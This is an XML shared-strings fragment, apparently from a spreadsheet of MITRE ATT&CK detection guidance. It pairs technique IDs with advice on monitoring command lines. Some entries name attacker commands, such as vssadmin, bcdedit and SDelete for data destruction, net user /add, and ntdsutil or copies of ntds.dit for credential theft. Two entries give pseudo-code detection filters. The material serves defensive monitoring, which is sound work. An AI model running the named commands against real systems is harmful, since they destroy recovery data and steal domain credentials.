    <t>attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc</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</si>
  <si>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</si>
  <si>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relationship--9ed53038-8320-4b6c-bbf3-764c68df8342</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>relationship--a5011724-f525-49dd-951a-5733fb5e8885</t>
  </si>
  <si>
    <t>attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--04c3e14a-e502-40b2-a097-e47b76a89d28</t>
  </si>
  <si>
    <t>attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search the Registry on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--a5a90de4-41ab-4275-9dfe-c0ddc6ab7565</t>
  </si>
  <si>
    <t>attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c</t>
  </si>
  <si>
    <t>Monitor executed atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All at jobs are stored in /var/spool/cron/atjobs/.</t>
  </si>
  <si>
    <t>relationship--e2ef57a9-be09-4b5c-b71a-f98e57a530c9</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.</t>
  </si>
  <si>
    <t>relationship--fd3d6028-8ccd-44ea-8ada-a0f85aa78495</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit</t>
  </si>
  <si>
    <t>relationship--adcf8267-dc71-4397-a02a-f4d03108281f</t>
  </si>
  <si>
    <t>attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e</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</si>
  <si>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</si>
  <si>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relationship--d99a5e57-de21-406c-84cb-f268bac37dd5</t>
  </si>
  <si>
    <t>attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5</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</si>
  <si>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</si>
  <si>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relationship--da82b0e0-0397-426f-a8d0-b596ec2d81bb</t>
  </si>
  <si>
    <t>attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c</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</si>
  <si>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</si>
  <si>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relationship--7e1f0009-69eb-4131-b0ba-0a9a5ab04718</t>
  </si>
  <si>
    <t>attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to collect files from a system's connected removable media. For example, data may be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>relationship--416d0e7e-ff7a-4cd0-9e2e-7cbb22f4cce8</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may employ various means to detect and avoid debugged environments. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>relationship--fb496deb-4085-4cda-9239-fe75ed7a8828</t>
  </si>
  <si>
    <t>attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d</t>
  </si>
  <si>
    <t>Monitor executed commands (`lsmod`, `driverquery`, etc.) with arguments highlighting potentially malicious attempts to enumerate device drivers.</t>
  </si>
  <si>
    <t>relationship--20a6ba86-f1a9-4dc8-98fa-7ab5a2f0f711</t>
  </si>
  <si>
    <t>attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5</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</si>
  <si>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</si>
  <si>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relationship--ef3ed455-e147-4823-bfc3-b40c82da8cb3</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</si>
  <si>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</si>
  <si>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relationship--4b4fadc1-a402-4d56-9e4f-8c76b03def23</t>
  </si>
  <si>
    <t>attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054</t>
  </si>
  <si>
    <t xml:space="preserve">Command-line invocation of the `auditctl` utility may be unusual, depending on how systems are typically used in a particular environment. At runtime, look for commands to modify or create rules using the `auditctl` utility. </t>
  </si>
  <si>
    <t>relationship--9ffa3885-c9ac-4219-8b2d-630588659bc1</t>
  </si>
  <si>
    <t>attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b</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</si>
  <si>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</si>
  <si>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relationship--a68e6fa7-1d89-48ba-9b0e-0e1378ba52c0</t>
  </si>
  <si>
    <t>attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579</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</si>
  <si>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</si>
  <si>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relationship--a5f9fb09-17b2-48fb-823b-811e4168f678</t>
  </si>
  <si>
    <t>attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--e6f9bcbe-43aa-451a-948d-85b64fd3c958</t>
  </si>
  <si>
    <t>attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--ae0b30fc-4a2d-47d4-8d69-d96d68dfe20f</t>
  </si>
  <si>
    <t>attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967</t>
  </si>
  <si>
    <t>Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>relationship--8dcf9179-ea86-499b-9624-8627e042bd42</t>
  </si>
  <si>
    <t>attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af</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</si>
  <si>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</si>
  <si>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relationship--11fa7881-e772-419a-89b1-4e1ccdc6cbea</t>
  </si>
  <si>
    <t>attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add /domain.</t>
  </si>
  <si>
    <t>relationship--726ac21d-55ca-4a09-b68a-c1d503eda417</t>
  </si>
  <si>
    <t>attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments that may attempt to find domain-level groups and permission settings.</t>
  </si>
  <si>
    <t>relationship--9e60bb82-19b3-4e76-82f0-32b8b6e611ba</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</si>
  <si>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</si>
  <si>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relationship--9486b28e-681e-4e19-a7d9-c496af933c2d</t>
  </si>
  <si>
    <t>attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather system and network information, such as nltest /domain_trusts. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t>relationship--3cefbbf5-c214-4b88-9b43-82e3aa0a0122</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</si>
  <si>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</si>
  <si>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relationship--182011eb-2283-4e01-88d5-1a6f2e032cd7</t>
  </si>
  <si>
    <t>attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497</t>
  </si>
  <si>
    <t>Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;).</t>
  </si>
  <si>
    <t>relationship--36f0a98d-2658-4eff-82f2-21defc09bb84</t>
  </si>
  <si>
    <t>attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments associated with modifications to variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>relationship--3abe204d-7369-4344-bc39-e648277a3a72</t>
  </si>
  <si>
    <t>attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470</t>
  </si>
  <si>
    <t>Monitor for execution of commands and arguments associated with enumeration or information gathering of email addresses and accounts such as &lt;code&gt;Get-AddressList&lt;/code&gt;, &lt;code&gt;Get-GlobalAddressList&lt;/code&gt;, and &lt;code&gt;Get-OfflineAddressBook&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--cb137e4b-f42b-4d38-9846-7ecd2d8f6071</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</si>
  <si>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</si>
  <si>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relationship--e54f5e9c-916e-4959-bc9a-54df541641f6</t>
  </si>
  <si>
    <t>On Windows systems, monitor for creation of suspicious inbox rules through the use of the `New-InboxRule`, `Set-InboxRule`, `New-TransportRule`, and `Set-TransportRule` PowerShell cmdlets.(Citation: Microsoft BEC Campaign)(Citation: Microsoft Manage Mail Flow Rules 2023)</t>
  </si>
  <si>
    <t>relationship--6f05eb5c-0916-40f2-8012-368d42c1a1d2</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</si>
  <si>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</si>
  <si>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relationship--82445480-83f2-40a9-af43-5b61ae6ca7cf</t>
  </si>
  <si>
    <t>attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).</t>
  </si>
  <si>
    <t>relationship--a99bd83e-b477-40da-8b82-512937421193</t>
  </si>
  <si>
    <t>attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather the victim's physical location(s) that can be used during targeting. Detecting the use of environmental keying may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t>relationship--8ee5727a-87fe-44f9-82aa-2b2d7ee70d75</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>relationship--ccbdfb01-1610-4cf1-ae44-e1fe521d5eb9</t>
  </si>
  <si>
    <t>attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information about the victim's business relationships that can be used during targeting. Detecting the use of guardrails may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t>relationship--d274629c-2a5b-4057-9181-6abacd8a158e</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--4f3ad71b-bcf4-4673-a7ae-f861066110d8</t>
  </si>
  <si>
    <t>attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--bb128bd3-3f00-46d5-8f15-e1b279badb2f</t>
  </si>
  <si>
    <t>attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over Bluetooth rather than the command and control channel.</t>
  </si>
  <si>
    <t>relationship--14ef646a-06c3-477a-a903-8a2b5d77a686</t>
  </si>
  <si>
    <t>attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--023ded69-4015-4487-bbdb-ab1102f547a0</t>
  </si>
  <si>
    <t>attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over a different network medium than the command and control channel</t>
  </si>
  <si>
    <t>relationship--e6ad6b38-a830-4e12-81e5-101a11517ce0</t>
  </si>
  <si>
    <t>attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>relationship--cb4bb8cc-f550-4c44-bddb-fa9d32cd0d23</t>
  </si>
  <si>
    <t>attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c</t>
  </si>
  <si>
    <t>relationship--48d9c71c-fdb8-4c5f-8d74-542b6bf61e56</t>
  </si>
  <si>
    <t>attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b</t>
  </si>
  <si>
    <t>relationship--642b199c-8118-4737-990d-d9dede6dfd5e</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--889c15fd-1d6e-4af2-a626-595681c4a8ad</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</si>
  <si>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</si>
  <si>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relationship--5d847c2a-ac23-4b74-a30c-f53acb3d0ef6</t>
  </si>
  <si>
    <t>attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>relationship--e7a538f7-9bd3-4eb9-a366-46923f28f417</t>
  </si>
  <si>
    <t>attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may exfiltrate data to a cloud storage service rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--ed44057a-14ef-47fa-baca-1869d874a072</t>
  </si>
  <si>
    <t>attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7</t>
  </si>
  <si>
    <t>Monitor executed command and arguments that may exfiltrate data to a code repository rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--4f31a0e5-3a3f-43b0-85d6-f9bcb6fe141a</t>
  </si>
  <si>
    <t>attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files.</t>
  </si>
  <si>
    <t>relationship--b620b0ce-baaf-4700-9454-92977c5172ce</t>
  </si>
  <si>
    <t>attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18</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</si>
  <si>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</si>
  <si>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relationship--bacfa3f2-7828-405d-bd20-dca0edb58513</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</si>
  <si>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</si>
  <si>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relationship--c823f79b-16c6-46ca-8e89-6fa975bdfee5</t>
  </si>
  <si>
    <t>attack-pattern--a2029942-0a85-4947-b23c-ca434698171d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments, such as requests for credentials and/or strings related to creating password prompts that may be malicious.(Citation: Spoofing credential dialogs)</t>
  </si>
  <si>
    <t>relationship--9a4500e9-b0b7-4955-b937-da25d065fb79</t>
  </si>
  <si>
    <t>attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e</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</si>
  <si>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</si>
  <si>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relationship--345de5a8-3ed7-4784-a62f-88059e2a5206</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</si>
  <si>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</si>
  <si>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relationship--b41dfa32-bec0-49ee-923f-d4880f4f31ce</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.</t>
  </si>
  <si>
    <t>relationship--5f1c3d51-2810-40df-ac61-26ac9e125c83</t>
  </si>
  <si>
    <t>attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may search for SYSVOL data and/or GPP XML files, especially on compromised domain controllers.</t>
  </si>
  <si>
    <t>relationship--98a274a6-ae73-428e-bf51-825c75f467b5</t>
  </si>
  <si>
    <t>attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading ".” and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>relationship--b25018a8-039f-4d5d-8243-fc5e8bb7c392</t>
  </si>
  <si>
    <t>attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that could be taken to add a new user and subsequently hide it from login screens.</t>
  </si>
  <si>
    <t>relationship--9003493b-6381-4bde-928d-852e050b5d22</t>
  </si>
  <si>
    <t>attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use hidden windows to conceal malicious activity from the plain sight of users. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style.</t>
  </si>
  <si>
    <t>relationship--50b44ee2-bef2-42a9-9bfc-2f5ce48748b7</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--77b9cc09-ebbe-44cc-86dc-452a9648caef</t>
  </si>
  <si>
    <t>attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c</t>
  </si>
  <si>
    <t>attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001</t>
  </si>
  <si>
    <t>Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>relationship--971209a8-f579-4433-baee-9b12d8199855</t>
  </si>
  <si>
    <t>attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments, such as `nohup`, that may attempt to hide processes from interrupt signals.</t>
  </si>
  <si>
    <t>relationship--8d8d6c36-e152-448a-89f7-f500b570b951</t>
  </si>
  <si>
    <t>30 August 2023</t>
  </si>
  <si>
    <t>attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.</t>
  </si>
  <si>
    <t>relationship--5fbeeb2a-e658-40fa-834c-68430bafbc4f</t>
  </si>
  <si>
    <t>attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59</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</si>
  <si>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</si>
  <si>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relationship--959882ec-644b-4d10-b75f-aeda438c251f</t>
  </si>
  <si>
    <t>01 September 2022</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--5c958009-dae2-44b3-840f-42985b0593c9</t>
  </si>
  <si>
    <t>attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da</t>
  </si>
  <si>
    <t>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&lt;h4&gt;Analytic 1 - Indicator Blocking - Driver Unloaded&lt;/h4&gt;
&lt;code&gt;fltmc_processes = filter processes where (exe = "fltmc.exe" AND command_line = "*unload*")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--2dcd9a05-5503-404c-8820-614932f63880</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--58d0e93e-15d3-476f-9fb9-4c953b072f53</t>
  </si>
  <si>
    <t>attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments to bypass security restrictions that limit the use of command-line interpreters. </t>
  </si>
  <si>
    <t>relationship--8a55c48b-7bdc-4c4d-811e-a4e6e0f93f9a</t>
  </si>
  <si>
    <t>attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for suspicious activity associated with downloading external content.</t>
  </si>
  <si>
    <t>relationship--737faeca-1fde-42e8-9a69-a334bdb575de</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as `vssadmin`, `wbadmin`, and `bcdedit`.</t>
  </si>
  <si>
    <t>relationship--742588af-8d12-4730-8cb0-d59667a4bdd1</t>
  </si>
  <si>
    <t>attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839</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</si>
  <si>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</si>
  <si>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relationship--2f16d53b-7f08-42d2-93bb-47e0f854eb12</t>
  </si>
  <si>
    <t>attack-pattern--2cd950a6-16c4-404a-aa01-044322395107</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>relationship--fe80fc5b-60ed-46dd-9e82-c4b99f6796f4</t>
  </si>
  <si>
    <t>attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may be related to abuse of installer packages, including malicious commands triggered by application installations.</t>
  </si>
  <si>
    <t>relationship--b89285b3-7d06-49ac-b4d5-c871436a0b67</t>
  </si>
  <si>
    <t>attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may check for Internet connectivity on compromised systems.</t>
  </si>
  <si>
    <t>relationship--bca66065-5e09-4cb0-9488-22db9eb588d6</t>
  </si>
  <si>
    <t>attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d</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</si>
  <si>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</si>
  <si>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relationship--f8127cf5-e2b6-41a3-b18f-ba250e2c01f9</t>
  </si>
  <si>
    <t>attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6</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</si>
  <si>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</si>
  <si>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relationship--2365c9aa-96df-47d8-8601-1acdf66737ba</t>
  </si>
  <si>
    <t>attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3</t>
  </si>
  <si>
    <t>Monitor executed commands with arguments that may be used to collect Keychain data from a system to acquire credentials.</t>
  </si>
  <si>
    <t>relationship--3a228672-276e-4aaf-b40f-6ce645176af0</t>
  </si>
  <si>
    <t>attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by the execution of tainted binaries.</t>
  </si>
  <si>
    <t>relationship--3d294579-20ed-4f98-83c1-97bdcaaeba86</t>
  </si>
  <si>
    <t>attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc</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</si>
  <si>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</si>
  <si>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relationship--c0846dd3-f7b4-4460-9047-917781e38b18</t>
  </si>
  <si>
    <t>attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90</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</si>
  <si>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</si>
  <si>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relationship--d5c05e36-531f-44f4-92d7-b3c728e2ddb8</t>
  </si>
  <si>
    <t>attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files</t>
  </si>
  <si>
    <t>relationship--793deb5b-f7f8-4848-980c-3701aaa24f5d</t>
  </si>
  <si>
    <t>attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584</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</si>
  <si>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</si>
  <si>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relationship--bb6922c7-0f33-426a-b06d-4faf90d42eae</t>
  </si>
  <si>
    <t>attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba</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</si>
  <si>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</si>
  <si>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relationship--c1fa57e2-939a-4745-95fb-7a594540071f</t>
  </si>
  <si>
    <t>attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d</t>
  </si>
  <si>
    <t>Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections.</t>
  </si>
  <si>
    <t>relationship--56d55fa0-fbb3-4630-b33b-342c0fa146e7</t>
  </si>
  <si>
    <t>attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345</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</si>
  <si>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</si>
  <si>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relationship--688b7c25-8c01-4893-a184-47564a79c96b</t>
  </si>
  <si>
    <t>attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e</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</si>
  <si>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</si>
  <si>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relationship--e1d6806f-8c00-4434-8957-4a86c3c7411b</t>
  </si>
  <si>
    <t>attack-pattern--635cbe30-392d-4e27-978e-66774357c762</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are associated with local account creation, such as `net user /add`, `useradd`, `dscl -create`, and `kubectl create serviceaccount`.</t>
  </si>
  <si>
    <t>relationship--d779c291-3835-45ba-b8a3-16f9b6b32cc2</t>
  </si>
  <si>
    <t>attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c</t>
  </si>
  <si>
    <t>relationship--bc535e23-87e5-4829-a531-cdcdb2b6b52e</t>
  </si>
  <si>
    <t>attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004</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</si>
  <si>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</si>
  <si>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relationship--303fb7ec-36b8-43a1-9dfe-e0c72ff574f9</t>
  </si>
  <si>
    <t>attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments that may attempt to find local system groups and permission settings.</t>
  </si>
  <si>
    <t>relationship--e75a0e7b-869f-4149-8b48-8bb1b9cb62ab</t>
  </si>
  <si>
    <t>attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969</t>
  </si>
  <si>
    <t>Monitor for the use of commands and arguments of utilities and other tools used to access and export logs.</t>
  </si>
  <si>
    <t>relationship--8403bdbb-e5ec-4c0d-b0e9-9cc502b613fe</t>
  </si>
  <si>
    <t>attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0</t>
  </si>
  <si>
    <t>Monitor executed commands with arguments to install or modify login hooks.</t>
  </si>
  <si>
    <t>relationship--b5a76d12-71ed-49bb-ad13-4f136b4faa9d</t>
  </si>
  <si>
    <t>attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for logon scripts</t>
  </si>
  <si>
    <t>relationship--17b6dd18-037e-4a39-bcc8-67ea8fafdd1a</t>
  </si>
  <si>
    <t>attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information about the victim's DNS that can be used during targeting.</t>
  </si>
  <si>
    <t>relationship--46c7e21b-ac5d-48c7-8145-44920d43deab</t>
  </si>
  <si>
    <t>attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>relationship--aff391e1-3b62-4906-8f44-f44c692ef1fc</t>
  </si>
  <si>
    <t>attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819</t>
  </si>
  <si>
    <t>relationship--f16f6933-0cff-4c88-a2bd-077e2de843fc</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.</t>
  </si>
  <si>
    <t>relationship--65fdde6f-f10a-4c9d-933a-384319194c8c</t>
  </si>
  <si>
    <t>attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for abnormal command execution from otherwise non-executable file types (such as `.txt` and `.jpg`). </t>
  </si>
  <si>
    <t>relationship--98c5b069-4550-4e12-98b9-701761c4a39a</t>
  </si>
  <si>
    <t>attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to manipulate the name of a task or service to make it appear legitimate or benign.</t>
  </si>
  <si>
    <t>relationship--cecd5f93-a1ae-4125-a165-ba7e1f389d52</t>
  </si>
  <si>
    <t>attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0</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</si>
  <si>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</si>
  <si>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relationship--e2d28cfc-da44-4668-abcf-18169911421a</t>
  </si>
  <si>
    <t>attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9</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</si>
  <si>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</si>
  <si>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relationship--05da04cb-7e7c-4d01-bee6-7c2f9c4e7a63</t>
  </si>
  <si>
    <t>attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4</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</si>
  <si>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</si>
  <si>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relationship--387d3f7f-0967-43da-a84e-e720a3b1e977</t>
  </si>
  <si>
    <t>attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade</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</si>
  <si>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</si>
  <si>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relationship--99448697-c14f-4c8f-8fe3-b90b25dbac19</t>
  </si>
  <si>
    <t>attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>relationship--edf637a6-fcaa-45f8-b107-c8d81315bf33</t>
  </si>
  <si>
    <t>attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Command line attempt to access or create a copy of ntds.dit file&lt;/h4&gt;
&lt;code&gt;suspicious_command = filter command_execution where (
(event_id = "4688" OR event_id = "1" OR event_id = "800") AND 
((command_line = "*ntds*" AND command_line = "*ntdsutil*" AND command_line = "*create*") OR
 (command_line = "**vssadmin" AND command_line = "*create*" AMD command_line = "*shadow*") OR (command_line = "*copy*" AND command_line = "*ntds.dit*")) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--17c61826-15ca-4eab-b3a7-073fc47a144d</t>
  </si>
  <si>
    <t>25 August 2023</t>
  </si>
  <si>
    <t>attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5</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</si>
  <si>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
&lt;h4&gt;Analytic 1 - NTFS Alternate Data Stream Execution : System Utilities (Powershell)&lt;/h4&gt;
